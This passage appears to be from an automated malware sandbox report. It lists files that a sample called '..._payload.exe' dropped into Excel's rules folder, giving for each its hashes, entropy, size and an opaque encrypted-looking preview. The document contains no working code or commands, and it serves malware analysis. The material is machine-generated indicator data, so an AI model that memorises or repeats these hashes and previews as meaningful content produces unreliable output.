                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10906v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1398
                                                                                                      Entropy (8bit):7.836653912210651
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Qh+eCd9cUhFzSNKofzcxxK6spZ48HxLgkIHhJgSqvFmnDWa3gGKxQv6bD:2+e29cUnSNLwkxLg1L1fiQwD
                                                                                                      MD5:12EABCE0C75E967FD2079925CA6DB417
                                                                                                      SHA1:7F08A3337D4B6C0D96A0D99FB66A92D9E2F20997
                                                                                                      SHA-256:78FB06D3396DA519AAEC6A5F18F3E30CBCE1136657641FFAEA8A3A529BDB2839
                                                                                                      SHA-512:E344941FC66008EEF1909C129F80AFFD13754608A10741878F9E0D858AB2F359EDF07E12569DEEF4921E45C2EDF8F62F385AC66EB7961482395F730AE9BB2397
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....k.#~.%..iP..yn.....L..,.....Q.....&.../N|..E...?......W.....<.9.NbZ.A.7dC.s..o.~..8..0.%..:.`:.....uL...Ll...J...I........%..;.s,..x..:.E]..yd.A.(...r..I$.....e.'s.;..........De...q...lI..W.....l...N.BB...c6........:...y.....|D......V.Z.j2.T........W..:J.mg...G)#..?.....r....[...q8V{.....:=[].......J:...0QF.(.<.u.92.W..&Wg..mv....qu..u..=+.08d.?.[.<p:z2L...3..Pj....m.92Y....6.l..4c..d...M.J.B/.1... !...!..9..l.0.c<....6..<?'..T&....l....R&...!].i.C.....L.....r~..m. (.9^4-7.Cb.........A..gIgMx.n.~b..ZK.G'..I..E.N...y...#.\.....U.*Cm...*).......K4gk......D...K...Q..........~..T.v.`..R.....aue..,`Bk.C<.r..'...&.x..'...F...4..........r.~G.u..&6.._.).y....Hbb........h..y3.......aT...cd..$.....t..(...6.L..[[.&cjA.:!.....dU.cE(..Hx..o.&.......kQ....&.O....p..A*CQ.fg.........uSX62.z,.G:z3.N.....j7..wP.....*.*%......4...~1.n......Z..\.h.(S._.......p0rT..).MF..&..0..?.G..Z....:aSA..;yp.C...p...j...:#E.7.!6...k..>K.$.b."4...0Jc.;....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10907v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):937
                                                                                                      Entropy (8bit):7.773383870998417
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:IkalC8inivhu1ae6GgaN3WpbJmHDHeDaZn9hfv6bD:JOSOhu1V9gNpbJm6D0bwD
                                                                                                      MD5:92682126C31D81E7AC2CA93272ED7E67
                                                                                                      SHA1:CB9E12DF74BE74B4D6912E07D1DF6D31EBC36801
                                                                                                      SHA-256:BCB732A422AFD306AC233CF83B96ADEC7644C321B6F07C7F1741A7A1DEE3B264
                                                                                                      SHA-512:FBA1E2FA25678114101EB6F5E40AEDA96F6085D0577546577CDD14BFB0D08D3CCD84745A549DA6FEAF5AC668987D24242872FA5D736D0824160D4708CF67CEFB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml5...Z@...........(M..........N[.'.....d/..A.fF."tpE.ppaO....../..X?j......F.A.:.$.o..!../.M\..k/...:...C.$..t.R......4..T.^9...Z`.-..sX.t|uU...o..0..p...)..5p...|...:...W.j.8>..){...S..D..D;.9...s.F.rU......>..A.`LK.mh8...<.ab[...U2$.ce="... O/.}l..GH....j.\k.."..;B6..@..ch..2Y.B....;.X.:...Y...x.I......_.*=.W....@Y.:!Td.D...].o..u...a(57;... .......e.P..9U/(.....2...$:2~.....ZGi|.5.*Q.B.1....l.3.lI....p.....6]a...?X..0......U...ll@...(e.L"....-.A.?...q........9hxB\L."0B.b-/...,...-..aJl.7..#.g. ..Y.~........ .C.....IU...Z..,...O.^.c..~9...C.k.T.vII>-.Mf..!.^.Mdg.I......gFe..F............[.{..6>w..@.|P...R.a.0"{.9Z...{...n.M...U....Y..#..A-7..}.0.CnS1..c.....;.../......6.!...J....<A.....j.....i:.R..-nd.N....g._O.@d?J...IU..*.VJ?...\l.....@.ga.\a..>W.."..l.............o6.Pu}.WI[...6.sH..2...(\...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10924v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):891
                                                                                                      Entropy (8bit):7.752639533939677
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zYEP46nirb7zjp2A4g+jVDMWH584NSYnv6bD:zYEP46nmjp94xjwyS2wD
                                                                                                      MD5:89F65308F3F107044FFB23D0528E6D96
                                                                                                      SHA1:8AE4DCBB1011775130277A38DC295438254A7A8D
                                                                                                      SHA-256:6F801A8C155B081202CDE0C59DB247905399B63D81C70B75D9B664623CD0A72A
                                                                                                      SHA-512:23DB13DCFC16C051C622A6ED36F07135C0D8142166A6D11932ED08A358A1C1067F94C5E431275D5DAB5FEE239B1F4EE10DC54FF1E170C27A5774812B5FBECB48
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..xl".M[....*M........4.9.h.\.\../.[~6...X..y.~..[.2|._$.F.wV....M....y../......(...n.vE.hsl..t %.6I<...U.K....t...l....x2J\8...$..\C..2......DR.......P....4.....p..y.........Xe....v......(./)J-.v...=.......K..z..0.)d.=...G$..V.kVL..<...(3[)2....c.l......d7e.o.4[...Q.0{..........B&..N.%..H@..zd.8........H.B>........a.LA.....Y...9..c*.*......j.,.@".#..qs.sC...n........$..........?....r3\.%.W..HV.e...2q..^...c....@1K..........7...~&.XU\....6.et.G^.)9../)..q.cX.q....7Z..X...~..^my..1.....1.i...X.@.R5.p..20K.;'.Jg.....q:...`....zW:(3..q..Cy7(6.Un..lr.x.....d..`..].....H.h.......+...wW....i.....1..CJ..).,_..s]........*..M.~.^.k.}J1.~*)$..f.|..U..}.[..}.. .........O.btt5.....L`.p..<.(,.....=..[t....Y~...u.xr.:[RC......._.I<.)%g.....|?.K.)s......T#n.5.jN..j.C#o.t.hp.$...N.Y.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10925v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1049
                                                                                                      Entropy (8bit):7.810685147272279
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:iCJsSRNgxp/HCvNcEn9HDan3PXw4RS7jPixIKLVX6vEGw5Av6bD:iAQx5HCVcE9ju3PXw4qWqjhuAwD
                                                                                                      MD5:476C306D9F535C039F1BAF5352D163A3
                                                                                                      SHA1:713A8F69B726FCF537C42F7321C2844730A953A8
                                                                                                      SHA-256:762BF7E8C46D277E741DD6C2E3CE40EC6873273C00808E193F73C23D75057858
                                                                                                      SHA-512:C3DAA9DEAE9CF9EA95099923D5F55B4006FAC26AD6AD7E732F37720E26BBD2E98AF987B467DABFC0B8ED4D2342141A768E18F63A151137EA5B1DC0C229562634
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlB.L.{.d....t.n!hg...b,.g=G}...f.g..gV.x..0.:u...Ob.Ag>1[....E...."f....{..I;@T.3.y.Y.@..Jr1......S..zUl..b.>\............ogX}`'"./.!W..v.g&........../X../.bO%..O.R..E..H4.....aN.b....KR>.n.H...k$.+B....3..*.......qKQk..b.P.^pw\..o.5......./]..t.h,..2y.....i....8.o.xM*..V.".K...[..w.....q>?....K.d..j..KQp`..2.......h..0.........h.......l.*{S&)...).m..R.\..S..|~D..Q...,.........D.mI.P?.7.5......To..Xv..ww.6.lx.t6K.....D....U.w.....{"....NG..b.|.g./...H0A.....QU<.`[?...K3.....)WJ.8...un...Gn..../H-.u/eD....F..J,.u/....F.G..I.=.s.p......)R.m...*._.|s.X.Q...Z_..m..^7.o.(m....:.j..j 0..@h...~_.oD.....m....G-j......H^-O..8B..+..Nb.<..D..^.....6..OW.].d.....jB{....).X..u.y..\ay.K......n}X.0~..a...{).....s..vi..v.Z.;...4(5.4.u..6..!..Q'....:.e<..y..YJ..H...R..9A.Q.....`Ya..r..Y...^Q...y....r.*....^&ys....Z.4..*.;Q.=MPy...q.Z........q. 8i.....w]>...."...L>|..$..+MTYjXy..l..N.....ly5`..y4e..#k.....s.7.*.\_#.....hZRMDGn2o1XdryxaQbOJI60EuHBvA

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10940v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):885
                                                                                                      Entropy (8bit):7.788694162124759
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+Oe33bMG/Ms+QA5Rn8MZNjasttCs/iYB0Iov6bD:+OMMGks1AX8EosttCCBIwD
                                                                                                      MD5:B435418C6B1BAEB5CD1E94AE83ABFA0E
                                                                                                      SHA1:E9B05431A802922239D5CAB4D1EE638E0D16DEBD
                                                                                                      SHA-256:814D2618C7F0F30C1DE674CD0975A59D8C5873BA6A55526A44EACA877A07D8C8
                                                                                                      SHA-512:88BBDEEC76B5B5CF274FA9028BE1E848EB8F81F199B6EB00122C09DF64C3B936624B29DFC2ED39B45682DDD0F26C1F1CCCF5D0539B712A0D889CFD6B0AB0BA84
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml......J;.q...).H.p.;...z6(['.........ct.8@Q<....6.....5h.i.]7l...]D..R..E.j...^-.......Y...N.L.p,6..f..l......3.!..@{k.]...}.>...z...}5....^..0;.....\4c..h.s.a...*v.B..tH....Y.\U5..=..Zhj...(...&.Q....*.:..Yc....;Ha^R..]..hKR_.....w.i.v....S...w.tH......g.n......<]+%.\[.....E.E....s. kk@K....?...B..Y.Q.)........zz...ev. .23...q&"?j....0.ta.....&.oN...i.-.g.#D. .....X..(......-.'y..z.g....z@s.Z.n....&.8.....$%.....7......L.b....&..9.}.z[f#v..P.!.m.._..6..F......]~j\V..$.D|Q.^..y#.pG..Z..._x2.Fw9I.V...0...z.pMAfKS..,......I_m.;..0]..FM..........3..&G.~.....,; D.z.8.....Yu..2\]L..|,[B.^.=x..(....W.....yl.$.......V........G*U...0....+......J...V....Yj.k9/^..A..,+vw(.......>.......?h.K;..N.0....(..Z6.G;.WX.#....T..Q..%.v..#T.g..*...`.-..B.u.C.].].O...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10952v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8529
                                                                                                      Entropy (8bit):7.978272476136693
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:2HZK0dlx1WbMZOzdf3hTDUPFJhzWDgElIsU3eeQaei9tKSdbD:wtyMozR9DUPFXC0ElIs1naeinKEbD
                                                                                                      MD5:7E8B113C06CC924D0A248C01CE6A3ACD
                                                                                                      SHA1:1868C009969C41D1D85BE84E115D523A0A62E206
                                                                                                      SHA-256:D5A072102ED3E462F4C676344BDB1DD204DE5878584B3F6FD5AC2195A8E78F84
                                                                                                      SHA-512:E4B439599A003A8644666CDFEB08838B5F23E0BFB0763BFBD1B29A42722D3E59CF8CA72FB8D0AF2EDCE5124DF3661346D4A3598A5600C1A1C04254C3F8C9B1EE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...8*r>.'mW7.....L>.=.<..n.y...Ts...7.t......J}.J.k.../...#a.m.(n.C.p.......3s*.C......ZD.."]......u.IJ...% ...J....\..:.K`.\n.~.......7.U.r.6=ao.....V.....[H.....5J.C...'.Q.@...e..x=..MS..t.....D..j..k.q&..|..{..0}.....,B..S......J.g..DF..y.X..?.QM.<8..1......'#...........X.!\9..u....K..s...mdJ..M.)b....y..].\...3.aB....u...c......(.T..~.......zS........Aev.X....x......8....F...:K.U..f&.ZY..i.E...s.....+.....,ZBs.N,...g.I`.+...&.ss....hu../.6..v.$3S.e."..W..# #i.......p)...\4...)..wTN.&P.%-QW..OJ..;q.g..c....2kT.a.S0G.nt....5.G......@N\.T...;.#.n..{.j..zf./..K..2.u..&..P...fk.:..A..d....]rv#....O.*....Y.....CdehV...<....q.0....T......(.bK...(.op.2}.0.*c...sh.."=.%}[....G.......=...0.K;:....9.`5..d....n.{.][$.6..o...h...J..'..+.e*z..@3...8..v....N...Tkj.$..w_w_...1.-.....vT. .I4....X.6.h..Q...3T..X/..._.}(i_r.........u<..X.+W........w.....\$+.%.C.........!b..6.v........8h.@:@t.Q.k......f.3..e..\K.vgsH.$.O........j.KY..8xc.h......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10955v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1242
                                                                                                      Entropy (8bit):7.817769935452273
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:brO5nE4tInf3OffbQ9kGAnoCLSc6PosasUEBs6EBtv6bD:EyfeBGAnoWSEs4twD
                                                                                                      MD5:DE74C571CC88C87D61093BB97F5BA2B5
                                                                                                      SHA1:331537A884044524D9074301BDA6017E0206F62E
                                                                                                      SHA-256:6BE3F63B3A1D742FFB69EBA1B0DB08D9EA3AC36DF8F0F30C0E5C4B07D10DA202
                                                                                                      SHA-512:A15A088A5F5D346EC702CB9B2A80558EA11D5A0FDE54AD3B098B289BC2D48009ABDF42E4951C22CB40DFD3506330420E251777381AE3C69260C61DA5BCC35C31
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.O...R.!../.An..'.kA=Z..bX.u.....Q..5vw...h80......\H_M.sd.....'Zi.y./.Kq..S.....Q..~|.......@.N)T....2sc....^.3......# ........n..".*OZI.......E.z.L...A]...It.U.........\8.Y.z...}.3.Tp...G..P...oF..j....n..$F.9...zt.....<r&hy..|[|.Mjn@..A.%.8.D..HE.i.p..M_kJ.....0.z..6).@..og+..|...vR..?.j-....v.G..*.?wO.w9&y3$...T...k.. .M.-.MX}.?P..V..9`)......mat<...d.Ga..{.......S...y...,,./.%_]xx.;.x..<73Y.%..L.I.z|MU.l....p.k)`8...E#'....O"w7.L!...\...+E.%.<>.d..7.j3......`..V...R..hU|.9\..2..J.......n.h.Jh.......)+.%U[...9.y..8.9vZ...}....."\l.@.B..........O........M6.x..<.oK.d.'..q.-..ZG/Q1..i.Kh[DSi.M(..<...1..t6..........~..>.IH.....t.p....<...;dy...8[.W..|k.#q._..."F<..u.....Ao.S].c...r...)...F......+.v5.>.7..z}R.A....2s'g-@.[W.H..R.Q...<3(f.._3O.e....E....^Y..0.g.3.}.8....e.b...W.EY#m..t.L.*..p.....e.P....9U!V....n.K............n..!.=.!.OF(..JCh2q......U9.n...IE.&~....L.x..?.._.k.Cc...."....2. .......;....+TR..w.]........&\.Eggo.;.=#E..S.[..(..k.2OvU

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11150v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1185
                                                                                                      Entropy (8bit):7.807767565444744
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:rCp9LGuZ7Mk0bKplpTb38eYFNmqVzhI+vDa/jQxDqJv6bD:I1lMk0bKpldLfYFH4+2/jQqwD
                                                                                                      MD5:99121061130742663FEA08EAE604AFD8
                                                                                                      SHA1:D1545C9369104F34C52F5A67C1CD78940AB23BAA
                                                                                                      SHA-256:251C0D5C654B8C785E90A18768EB9D85175923C8B38347EC30CA2CEC01CFE95F
                                                                                                      SHA-512:5D5F6EC8AF23584B22C42393EEE53A5E81FB1C0DE2F1ADD8945C9C9AB749C30B1C82EDF89070D554776601973CF85C19A60ABDD64181DA8B55F2F029C4E655D4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.E.$.b...h.y.U........6.a..JJU. ..e...0..$.#w9E...5..A.LE..&`..5..&..*.Q.{..a./.3..Q.(.(.T.S.B..+.}.....Sz...:#..V.#....* ..p.L....2....3.."y.....9.Zl.P...2~.0..x.....Q..e.F.....k.CM.^].......p..wk$.cFF}..k..<bw...u....!94.W..s^a..#..y[L+.gq...F....e....c.^...'.....m.....?dlQ.z.V.p.... ..DG...6.X..... J......mK.u4./..U...I1qO.....z...@3..h..!J!.}j.........V.'.x.@.W..e_r......:*.......M4....t|.M8.Z.........H....6....r..'.a.7..gZC....k..h.E.....@.P.p!*.P.f.S0..aB)Mo0F.k.N..:Y.. .P....W...'R~..A....P..Q.l...aI.;.!..)-...Z.*...`p.;m-.g.#`.c{.M.q.G...7.{4:..Wb..b....wG.P1-..oO..Ta)|.Qe.........H.\.OYg.7...f$!....5)X'...S...N.....$......n67...`3....= ....ELs.l..(_......Z.....>r^a.......Z..tC...R.)p.hCFX..p.67".k(A.q..G*..O.J.81^x`[t.....9..H\ 3..o.D.....SAJ?..C..$]...V.jb..Mo.(.t....)i.B.N.....#../..k.H..y]9:.V..k..{.......7+ea.6..7p.A.....u..j....Z......!.....>G............7c...a.^V....gS].!'.5E...k!.$...j.....CO.y.....PG|_.`.Q.)@._.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11154v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1073
                                                                                                      Entropy (8bit):7.8037513670098235
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:uRFfrVHBLSoTS9UijeZb3DJzCRs2xM4v6bD:AlJHFSuS9bjeZ3DtS/wD
                                                                                                      MD5:4D0B960AEBD3183ECC89ECEEDBA92A2E
                                                                                                      SHA1:F29EA022E2C95BB0AECBAA7E0917D40E48C0E440
                                                                                                      SHA-256:481BAAF44836A71309D624C2FDC85E8C8FC0991AF87366FB4731C5D6A1ED1F56
                                                                                                      SHA-512:40130ABF89D974B2E7748B0FDDB0BCF3FCC011F77AD01B493798B7668CD377F85E3B58893F2B4C46704C39F8B9A0BEA0B47C1DC93FCFA73293B9C115399EACA2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.....V.7.%.....\0.IT...|..)p..;.CfN&S.N..<.......#P2.O5.<.6.....]....".|!u....,B...[......xT...A..9./..)......]|..)e....r..js.!....D....C/.....".........b..R...gw:..S..w....H*.s.7...Z,...D..<.$F...K..o...[.v.J*ZR.K.......c...Q.F.s....P.?B..[U...J18..8:../I|.0..W.S..z=.d..h$9.a.[.lnt...m..$>.6..#..eO..........-.........S...&...7.@....Ms4/..6....u.\=..|..../.P.#.8.....6.A.Gu..1..X.....ZhR.j.s:.S.e...b#..1C..>.......>R.k.....*....G....Pf!..Q.+...H.{..7%.......Z.y.\.H<._..].0.h.C......e.J..ZL.cR=......e..1H".....]..n!..a..mUc.R... N.;.....a\;G4`l....[Q..0...h.-..,..YW....0..9.a.FC.c..J.@#.. ...O4.v.n.'....C.....l..w.`l...\...zE..s..p#.qr4...QZD....<...y........V....g.C..J.9..5.z.JP=*......_...i.S....Nd.x_.X.....k.d.^<....ap.+.Ah..|u...W...f/3pG...>...K....x..]..%Ok.^K?n.....q..p...}..".c...1.RaR.h#..a]...}?$.6mY..=.......M..E'......oO.7sY.....+.......Uk:1..(+.Y^.?\I.IZ&mf..k..w....U...3..B?57......*AY.\...2tzw.vj.p.~V.l..../Q.....9.hZRMD

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11187v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3232
                                                                                                      Entropy (8bit):7.943787929187925
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:AC4GORbedsDwPZrSTSnR8rZqNjbdi5XNH25:h4GgeCOeGna1qF5WN4
                                                                                                      MD5:4F91215A920B1B6FE1121FCB9BC84300
                                                                                                      SHA1:F91BB3B8DFD949588F4F907B8A7350F0EE25671F
                                                                                                      SHA-256:F75BE2A3D1DB34EA23638C4FD610ADB6CDC3AD8CDCDDB7BCC6B162501EAC4435
                                                                                                      SHA-512:C601F5759A68EE1A20B6A331D9F7428E7FBB36338397F67C75A9087CB0259494001CB901D67617313C5852AE7167D3C8A732E7E8826CF633772099266A9D96A8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..X....{Ic.Xa..f2D(..k...H.t.(9q.....^..*T.T..A....Q....`.-..f.!..4.D}.M..}Cu.[.o#W..Xq.?...x:.......C.W...d.......YY.v.7.F.l'..1_:.i.../..7J-..*.0..8c....4.f..Z.U..i..)3..4..9....i(.a.~.-.x.tbX.c.$...U?.......W...VE...gU.(.....Q..).:..]..i.N...n..yRZ7$.D.....E"...2./...?0,D.m+W.H.0.8...Na....j9.5.{.x.J.....=.A.r....Ir3.%..`.$.0..K...R..._........O.v..T'.7.!K.o6...=[.}i..q........)&...~..3..N..=..w^...Bi.........`...sOQ.?...{").+..6O....oHV...Y..c...?R9[...by...}..U..=.....w..>N..n'..(...N....L..x.w...n.Dma.... ...Y.M...?.J.}.2h.>.{...P....I.8~,..mw`a.3(Hy.....5.'.E.).qD.K.......<..22U|Ko.I.Vt.nKT..S...g...C.IT..../]..\Hnw......q...2..h2RG.{...s...Z....u...9.\...F.J.....6fvR.J.S.....s9....%....T&.E...I..R.O9g...!.;.....I.nt...t.0O.~mj.....C1(8..r..`.:cTA.........%...2.na.+w.r...i7.. .-Z:.MA?...,..Fvs(_....M..9...*....".G'Fy.z.I.."h.Hyb.CK..y.~HN.U..ep.7S...-...of.6.......t(....r(.......;C...%..}!......V..7J....0.k..'.r..D.>R

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11190v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1231
                                                                                                      Entropy (8bit):7.825299106879957
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tBxvxXhiIspyioeh6CrXeh6e39QOnDxfxq7Ms0N8UPX4MCTcQ8gXRfv6bD:rx5IPyix6CDeke3pD03UPXg4RUwD
                                                                                                      MD5:39CF5F816A33533F119133D7D7BD8D65
                                                                                                      SHA1:35F21A2F1C50C3FFF13D5E4212DDEFC29057A3B3
                                                                                                      SHA-256:E24DEA748EF6B34DCF852C12486586E95C35995C9164BEF7F72B18AD6C63B8DE
                                                                                                      SHA-512:5DBE753196255D81184E888BD5A9A78D33F7D9523755A7731F3798ADCC9778666F166A37AC6BA235CAD36FD65C1ADA9D2CB44D4D2934E4EA473DB95347AEACAC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.\u...8.3..E.4..`Hz..l...<........P....[e..?X..}..Kv..QJ....`f.^.6W1c..%..6...vt?D.(.+Z........r#..K..Ysc.]@`.Y.].!.M..j?..Sl`.dz...3...d.su/....,ri.Vy.M7..m.Qc9LX....h4.P.v.@......lg..`.x<.3\.d3c^[.r[...W.....E..XE...pH0.E*.A....i9.`j..id]B....1....%..JF.2.W^.O...C..|A.|....gX.d..%.I^..LJ....Jb{.4..V.)<..6.eF..x$.N/..P..]..O...g..#W|......P....d....;.T.3.A..ul.....[II.^.d...+3..SVt..../6k...OE.iBF.r(c...l..7...-./M...i..`...A..\...a:....4.9.....r.].........._\...MBF....'.&T...g.....&o-~..).hw.]...T..."....tH=....dusB.8...jKc:r.}...c.e....O..k+4(I."gLV.e..........qUW...g.S.M..`C..p.T........hG7...j...f.&.#..]PnK.n.....'N+....f...|~..%...8B!...K.........N5._..q..f.]...\..lLV8....iw....f.o.m..{..k.........2@*t..J.;.K7.........F...(.!z...d.$....}Y..(..[...ky.8k...e._>;.V.5.fs..[..;..z.'...pK.>s:...=..T........[`...J......... ...=S.S....&.....H..?...H....my..IM..b9yL.0....*...f..:....*....\......U.g.Z..G4.:..rK..d......1.C(.?.A....C.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11195v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7567
                                                                                                      Entropy (8bit):7.978609212188471
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:37DSiFHyZcFIkikvTihUWouOrvK0e9r7gKyof:3CkORcvTS5Fvr7OO
                                                                                                      MD5:28FFC5D4D6E678F05A4F427ECD8824A7
                                                                                                      SHA1:E3B0832D233A3BF2752C159E787F865908ED4D63
                                                                                                      SHA-256:0C65F90230AB115CCE70C9754A98270E021F93B04D722DE87286773B4A07F092
                                                                                                      SHA-512:6B25908719E0FFFC61E4056B62C4B9DC4E3ACAA78E1B3818094B216796DB17BF3D9228EC254FE9D6A025055F87912F9D61A4F9EB2409DF5CF86099B138F7D294
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.~....tm..s...-1.X..2...H..h6~.|a.S\%..R.........).....l?.:F......c}.G.p1..)....=....;.d...{.O.GV.hh.m.0*.......yx.Sa?s...Ps...K..a....)...W.0..b0.....,..X.7.....f,...~..kB.c-y...j._S..U.%.q...[.F.yC{B...|H.P...F4..t{....x.m._...c.b..1>'.gR..!.9...Dm.$.......b.k..../...7..0/P>.b.3$1.W..?%^DK.2k....t........1...#.....TVW..q8..mZ."...+....i...DT~ZA..4.J.D..A.3..+(a...!K.@w\..es.9p..6...y.{`[.$....s......z....}..k.\A.h....z.fK..U.v...C$...$....K...J.A.+f.........H...f.*.i.6.O...o..._.Yq1..w.......K).A..1'..f......1......y^..._cc..w..F..T....A..?...VI#0....9K.-..B.n.......Y.s..Mz].<.....!0,d.<...i.b.h.F...Z.......p..V....2.....6.C.j...L...r.U..e..t...o~..}......./.pj....i....2..#i4..:..[0M...d~.N...\N.3.A.S"..x.Uv.a.>.J.....##\....66.s.6Q..*irp.PkB&K.'.."-m.i.WK.k..b._{....m.......7.......^#D..?r..4.....}V.-....x........./..1..O.'......>...$.O...b..".e....vpc.G...\.".......2h~.-...r..M.0X.../.VA.#.....4.t..,.........2e....(...+/..*.5.1j.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11208v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):816
                                                                                                      Entropy (8bit):7.732047879141789
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:/2O/y3rY2qOVW4SfMSc5HDCYx22DMjwq++IACj+4v6bD:RSrYsMULxCSdWPBzf4wD
                                                                                                      MD5:11EA18E42547C85D0E5FA0D1DBFE9DA7
                                                                                                      SHA1:182429465669623F71736927BB6B8AA75ACBF40B
                                                                                                      SHA-256:3D53EA98A8E81699042D7C9A31722570FE02B0F2462F426D8730C17F191B2A8C
                                                                                                      SHA-512:DCF15A0D7B0BBA0C6424AFF0C2ABA50CC2EB55F1D2685B944EDD3B9F34180BDAAFDD1A717B5D385259490FACF81218AD360064EE74E512F61F1A2FC0926363F4
                                                                                                      Malicious:false
